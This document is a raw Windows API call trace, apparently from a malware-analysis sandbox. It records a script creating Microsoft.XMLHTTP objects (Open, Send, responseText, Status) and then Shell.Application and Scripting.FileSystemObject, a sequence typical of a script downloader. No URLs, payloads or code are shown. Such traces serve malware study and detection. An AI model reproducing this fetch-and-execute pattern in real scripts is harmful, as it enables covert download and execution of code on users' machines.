	[0558.800] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.800] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0558.800] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0558.800] ??2@YAPEAX_K@Z () returned 0x62f330
	[0558.800] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0558.800] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.800] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0558.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0558.801] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0558.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.801] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.801] longjmp () 
	[0558.801] longjmp () 
	[0558.801] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0558.801] SysStringLen (param_1=0x0) returned 0x0
	[0558.801] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0558.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0558.802] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0558.802] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0558.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0558.802] ??2@YAPEAX_K@Z () returned 0x62f310
	[0558.802] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0558.802] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0558.802] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0558.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0558.802] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0558.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.802] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0558.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0558.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0558.803] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0558.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0559.407] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0559.407] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0559.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0559.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0559.408] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0559.408] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0559.408] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0559.408] SysStringLen (param_1=0x0) returned 0x0
	[0559.408] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0559.408] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0559.408] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0559.408] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0559.408] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0559.408] ??2@YAPEAX_K@Z () returned 0x62f350
	[0559.409] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0559.409] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0559.409] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0559.409] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0559.409] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0559.409] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0559.409] SysStringLen (param_1=0x0) returned 0x0
	[0559.409] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0559.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0559.411] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0559.411] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0559.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0559.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0559.412] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0561.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0561.068] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0561.068] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0561.069] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.069] SysStringLen (param_1=0x0) returned 0x0
	[0561.069] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.070] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7330) returned 0x0
	[0561.070] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0561.070] ??2@YAPEAX_K@Z () returned 0x62f310
	[0561.070] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0561.070] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.070] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0561.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7330) returned 0x0
	[0561.070] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7330) returned 0x3
	[0561.070] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.070] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7330, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7330, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.073] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.073] SysStringLen (param_1=0x0) returned 0x0
	[0561.073] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0561.073] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0561.073] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0561.073] ??2@YAPEAX_K@Z () returned 0x62f330
	[0561.073] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0561.073] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0561.073] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0561.073] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0561.074] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0561.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0561.074] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0561.074] SysStringLen (param_1=0x0) returned 0x0
